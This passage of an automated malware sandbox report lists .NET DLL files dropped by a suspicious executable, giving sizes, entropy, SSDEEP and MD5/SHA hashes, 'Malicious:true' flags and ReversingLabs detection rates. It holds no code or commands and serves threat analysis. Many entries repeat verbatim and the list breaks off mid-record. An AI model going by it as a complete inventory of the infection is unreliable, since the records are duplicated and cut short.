                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):36352
                                                  Entropy (8bit):5.668291349855899
                                                  Encrypted:false
                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):126976
                                                  Entropy (8bit):6.057993947082715
                                                  Encrypted:false
                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):85504
                                                  Entropy (8bit):5.8769270258874755
                                                  Encrypted:false
                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33792
                                                  Entropy (8bit):5.541771649974822
                                                  Encrypted:false
                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):69632
                                                  Entropy (8bit):5.932541123129161
                                                  Encrypted:false
                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):70144
                                                  Entropy (8bit):5.909536568846014
                                                  Encrypted:false
                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33280
                                                  Entropy (8bit):5.634433516692816
                                                  Encrypted:false
                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33280
                                                  Entropy (8bit):5.634433516692816
                                                  Encrypted:false
                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):64000
                                                  Entropy (8bit):5.857602289000348
                                                  Encrypted:false
                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):85504
                                                  Entropy (8bit):5.8769270258874755
                                                  Encrypted:false
                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):85504
                                                  Entropy (8bit):5.8769270258874755
                                                  Encrypted:false
                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):69632
                                                  Entropy (8bit):5.932541123129161
                                                  Encrypted:false
                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):126976
                                                  Entropy (8bit):6.057993947082715
                                                  Encrypted:false
                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):46592
                                                  Entropy (8bit):5.870612048031897
                                                  Encrypted:false
                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33280
                                                  Entropy (8bit):5.634433516692816
                                                  Encrypted:false
                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):126976
                                                  Entropy (8bit):6.057993947082715
                                                  Encrypted:false
                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):36352
                                                  Entropy (8bit):5.668291349855899
                                                  Encrypted:false
                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32256
                                                  Entropy (8bit):5.631194486392901
                                                  Encrypted:false
                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 24%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):126976
                                                  Entropy (8bit):6.057993947082715
                                                  Encrypted:false
                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):85504
                                                  Entropy (8bit):5.8769270258874755
                                                  Encrypted:false
                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):64000
                                                  Entropy (8bit):5.857602289000348
                                                  Encrypted:false
                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):342528
                                                  Entropy (8bit):6.170134230759619
                                                  Encrypted:false
                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):64000
                                                  Entropy (8bit):5.857602289000348
                                                  Encrypted:false
                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):342528
                                                  Entropy (8bit):6.170134230759619
                                                  Encrypted:false
                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33280
                                                  Entropy (8bit):5.634433516692816
                                                  Encrypted:false
                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32256
                                                  Entropy (8bit):5.631194486392901
                                                  Encrypted:false
                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 24%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):69632
                                                  Entropy (8bit):5.932541123129161
                                                  Encrypted:false
                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32256
                                                  Entropy (8bit):5.631194486392901
                                                  Encrypted:false
                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 24%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):64000
                                                  Entropy (8bit):5.857602289000348
                                                  Encrypted:false
                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
